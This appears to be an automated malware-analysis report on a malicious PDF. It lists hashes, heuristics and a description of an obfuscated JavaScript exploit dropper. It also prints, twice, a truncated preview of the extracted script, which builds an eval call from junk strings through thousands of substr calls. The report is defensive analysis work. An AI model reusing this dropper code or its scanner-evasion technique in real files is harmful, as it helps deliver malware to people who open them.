PDF malware analysis — malicious · 81a5c2e29b70ee42

MALICIOUS

PDF

118.5 KB First seen: 2012-10-10

MD5: 996e80c3feb332ee0204f99911d01713 SHA-1: 62f5f9cb11b733f54c79484d767c1fe3dd31f1b8 SHA-256: 81a5c2e29b70ee42bae6c6b39160f0039ca0fd252b688a217ef8ad05498af8d2

106 Risk Score

Malware Insights

MITRE ATT&CK

T1059.007 JavaScript T1566.001 Spearphishing Attachment

The PDF file contains heavily obfuscated JavaScript, indicated by the 'PDF_JS_EXTREME_STRING_REWRITE_OBFUSCATION' heuristic firing with over 4000 rewrite calls. This script is designed to download and execute a second-stage payload. The ML classifier also strongly flagged this PDF as malicious. Due to the extreme obfuscation, the exact URL or payload could not be determined, but the presence of the script and its nature strongly suggest a malicious intent.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 3

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript rewrites strings thousands of times to hide its payload critical PDF_JS_EXTREME_STRING_REWRITE_OBFUSCATION

The document's JavaScript performs an extreme number of runtime string-rewriting operations (substr/substring/replace/charAt/charCodeAt) — it rebuilds its sink names and payload by slicing and replacing junk-interleaved strings so the literal exploit sinks (util.printf, Collab.getIcon, unescape, eval) never appear for a static scanner. Benign PDF form/calculation scripts use a handful of these calls; obfuscated-exploit droppers run into the thousands. This rewrite density has no benign purpose and marks the file an obfuscated JavaScript exploit even when the specific CVE cannot be statically resolved (the sinks are only assembled at run time).
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0076_000.js pdf-javascript-stream PDF /JS object 76 at offset 0x2C2 103702 bytes

Filename	Kind	Source	Size
`javascript_obj0076_000.js`	pdf-javascript-stream	PDF /JS object 76 at offset 0x2C2	103702 bytes
SHA-256: `ec239aa857aef8ba7dad9b55d6ac63aed128b21bb920e147789480a6ae096f6e`
Preview script First 1,000 lines of the extracted script if((String+'').substr(1,4)==='unct'){ e=((('a1'))).indexOf; } c= 'lup9viN\|7m(_,E'.<03{4%cjdSh* 1f@DwaC>o6U]z2+-/8V[Qn;q)"e:=Ms}KgbrWIAPxk&G5yt'; l='l'; e=e()[((2+3)?'e'+'v':"jkrl23jrkl2")+'a'+l]; s=[]; a='push'; z=c.substr(5,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(10,1);s[a](z);z=c.substr(55,1);s[a](z);z=c.substr(10,1);s[a](z);z=c.substr(14,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(14,1);s[a](z);z=c.substr(53,1);s[a](z);z=c.substr(53,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(23,1);s[a](z);z=c.substr(59,1);s[a](z);z=c.substr(62,1);s[a](z);z=c.substr(57,1);s[a](z);z=c.substr(14,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(18,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(22,1);s[a](z);z=c.substr(55,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(73,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(22,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(8,1);s[a](z);z=c.substr(73,1);s[a](z);z=c.substr(55,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(55,1);s[a](z);z=c.substr(3,1);s[a](z);z=c.substr(18,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(18,1);s[a](z);z=c.substr(18,1);s[a](z);z=c.substr(73,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(22,1);s[a](z);z=c.substr(17,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(17,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(18,1);s[a](z);z=c.substr(17,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(17,1);s[a](z);z=c.substr(22,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(17,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(8,1);s[a](z);z=c.substr(17,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(73,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(22,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(8,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(18,1);s[a](z);z=c.substr(18,1);s[a](z);z=c.substr(17,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(24,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(73,1);s[a](z);z=c.substr(55,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(17,1);s[a](z);z=c.substr(18,1);s[a](z);z=c.substr(18,1);s[a](z);z=c.substr(22,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(18,1);s[a](z);z=c.substr(18,1);s[a](z);z=c.substr(8,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(42,1);s[a](z);z=c.substr(22,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(73,1);s[a](z);z=c.substr(55,1);s[a](z);z=c.substr(55,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(17,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(17,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.s ... (truncated)

SHA-256: ec239aa857aef8ba7dad9b55d6ac63aed128b21bb920e147789480a6ae096f6e

Preview script

First 1,000 lines of the extracted script

if((String+'').substr(1,4)==='unct'){
e=((('a1'))).indexOf;
}
c=
'lup9viN|7m(_,E'.<03{4%cjdSh* 1f@DwaC>o6U]z2+-/8V[Qn;q)"e:=Ms}KgbrWIAPxk&G5yt';
l='l';
e=e()[((2+3)?'e'+'v':"jkrl23jrkl2")+'a'+l];
s=[];
a='push';
z=c.substr(5,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(10,1);s[a](z);z=c.substr(55,1);s[a](z);z=c.substr(10,1);s[a](z);z=c.substr(14,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(14,1);s[a](z);z=c.substr(53,1);s[a](z);z=c.substr(53,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(23,1);s[a](z);z=c.substr(59,1);s[a](z);z=c.substr(62,1);s[a](z);z=c.substr(57,1);s[a](z);z=c.substr(14,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(18,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(22,1);s[a](z);z=c.substr(55,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(73,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(22,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(8,1);s[a](z);z=c.substr(73,1);s[a](z);z=c.substr(55,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(55,1);s[a](z);z=c.substr(3,1);s[a](z);z=c.substr(18,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(18,1);s[a](z);z=c.substr(18,1);s[a](z);z=c.substr(73,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(22,1);s[a](z);z=c.substr(17,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(17,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(18,1);s[a](z);z=c.substr(17,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(17,1);s[a](z);z=c.substr(22,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(17,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(8,1);s[a](z);z=c.substr(17,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(73,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(22,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(8,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(18,1);s[a](z);z=c.substr(18,1);s[a](z);z=c.substr(17,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(24,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(73,1);s[a](z);z=c.substr(55,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(17,1);s[a](z);z=c.substr(18,1);s[a](z);z=c.substr(18,1);s[a](z);z=c.substr(22,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(18,1);s[a](z);z=c.substr(18,1);s[a](z);z=c.substr(8,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(42,1);s[a](z);z=c.substr(22,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(73,1);s[a](z);z=c.substr(55,1);s[a](z);z=c.substr(55,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(17,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(17,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(21,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.s
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.